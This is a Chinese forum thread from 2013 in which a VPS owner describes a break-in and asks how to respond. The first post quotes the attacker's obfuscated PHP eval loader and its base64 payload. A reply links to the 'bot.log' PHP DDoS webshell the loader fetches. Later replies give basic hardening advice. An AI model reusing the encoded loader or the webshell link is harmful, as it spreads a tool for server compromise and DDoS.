zghz 发表于 2013-5-29 13:14:50

centos VPS被入侵,我该怎么处理?

本帖最后由 zghz 于 2013-5-29 13:16 编辑


这个黑客昨天在我的网站根目录放了若干个文件,然后我的站点任何一个页面打开就只出现一个图片无法显示的红X。

查看网页源码,它把下面的字符串经过 eval(gzinflate(str_rot13(base64_decode('这里放的是下面字符串')))) N重加密

3ZjNd4NAGFL3hb6DuyQFNb+lNEO6KV1p032w+hktk5nBGXhPyLs3LU2NV4jTht5pF4ODB8M9HBKH/TDlvo4FX9A6SU31e7QmvzcYeS
8v7j8+9nvZkrQVdi1iXTfLMicg4SmicVJZOJy5mbR9wTVk7VeWLnCu3BehHSaWlv1xbKPr8Sz0pjfXs+F1U8PpzSQcQib+iz8dBU4wZ17lZ
S4pbifd2RvMv7j8Z3/IkFickYvtHxyIjDPhBZbtGSKekWLD15atUZr4cQhqalO8kLQfnfoLmfGbgT0+PJs97u58LytMTGkSaZ9BYLltJeew08
75Qyde8KFC/YsTe/IFJuz0C0BgBcQ8oLUjI+lctZEbiuKbfulj/BC7+8Hd5QUxUmRY0aiIGFtHuqb8ArFhqmdrAqzS4ervgBJIfkhVQPVI8b
DESiXreaiDbMFpQxsltgzwm6iV9i/IAbiP2jBkckTrklMzHbn3F+1xQ0SGDCe01FN2TRUd9WwB2UM5GaAyZjJgWhaEsHfMARFomKOBKT
Cn6mGjb1O4nUcjxB38H+ijOim6AJC7qIb4D4Xw5iXHcKr2Cr56n+4hZjRypKeUjpI0j5niEjF0VzY8v5V5uHOrMKI6rVEEtEwJh+WxkquzX
CqTgo2bJiPy/PEDp4UVXwfAkdOEBNdQo0R+USDGf7B5au8=

网友帮我解密后代码如下:

http://cupic.img168.net/bbsfile/forum/201305/29/125955r00r0rl022r1tjst.jpg

我的理解是他把代码放在了图片里,然后在我的目录里面执行了这些代码,我想获取这个图片看他到底做了什么但是我不知道该怎
么获取。



PS:后来我把这些文件删除了,我发现除了昨天,前几天这个人还放了其他一些文件到我的服务器,并且那时候访问我的网站任
何页面都非常卡,重启服务器后情况缓解,但过一段时间又变得非常卡,不知道是不是这个黑客又进行了某些操作导致的。

请问

1.能否有兄弟帮我找到这个图片并翻译成代码

2.他是通过什么手段入侵我的服务器的?

3.要这么做好服务器安全措施,以防再次被攻击?

先谢谢大家了!

abcwuwuwu 发表于 2013-5-29 15:08:59

把 exec 这函数给禁了:lol

fatiery 发表于 2013-5-29 15:42:35

1.能否有兄弟帮我找到这个图片并翻译成代码

重点代码直接看 http://deoaseermelo.nl/wp-content/plugins/bot.log

2.他是通过什么手段入侵我的服务器的?

任何一个漏洞都可以入侵你的服务器,最普遍的如系统漏洞、网站程序漏洞,如果你用的是常用的CMS或博客类程序的话 十有八九是网站程序造成的

3.要这么做好服务器安全措施,以防再次被攻击?

服务器安全防护是一个专业领域,需要花大量时间学习和研究。
防止被攻击,最基础也是最简单的有效的方法就是经常更新网站程序,因为根据我的经验90%以上的入侵都是由网站漏洞造成。

想更安全一点的话可以修改SSH默认端口;关闭不用的端口;安装防火墙(常用的如CSF);安装杀毒软件(如ClamAV)定期的进行扫描等等。

另外想告诉你,被加密代码的作用是下载“bot.log”这个webshell,这个webshell是一个phpddos,用来攻击其他的服务器,很占服务器资源,这就是为什么你的网站打开很卡的原因。

zghz 发表于 2013-5-29 15:48:52

fatiery 发表于 2013-5-29 15:42 static/image/common/back.gif
1.能否有兄弟帮我找到这个图片并翻译成代码

重点代码直接看 http://deoaseermelo.nl/wp-content/plugins/b ...

太感谢你了兄弟!bot。log这个webshell 是否还存在我的电脑里面,如果还存在我该怎么删除它呢?

fatiery 发表于 2013-5-29 17:00:23

你可以运行 find whereis locate 这样的查找命令 查找文件并清除

关于命令的详细介绍请看:http://www.iteye.com/topic/406709

luguo 发表于 2013-5-29 18:06:21

history 命令, 如果没删除的话.

河小马 发表于 2013-5-30 03:31:47

入侵是挡不住的,只能经常备份,同时随时升级

对于vps 来说,如果不是很懂的话,建议买managed 的服务

否则问题多多

zghz 发表于 2013-5-30 10:10:57

luguo 发表于 2013-5-29 18:06 static/image/common/back.gif
history 命令, 如果没删除的话.

好的兄弟,谢谢!

zghz 发表于 2013-5-30 10:13:43

河小马 发表于 2013-5-30 03:31 static/image/common/back.gif
入侵是挡不住的,只能经常备份,同时随时升级

对于vps 来说,如果不是很懂的话,建议买managed 的服务

好的,感谢河马!

aabbccli 发表于 2013-5-30 16:27:05

入侵分两种,一种是网站程序漏洞,一种是服务器本身的漏洞,服务器可以用IPTABLES把非80端口的外网请求全禁了,程序漏洞的话麻烦。
页: [1]
查看完整版本: centos VPS被入侵,我该怎么处理?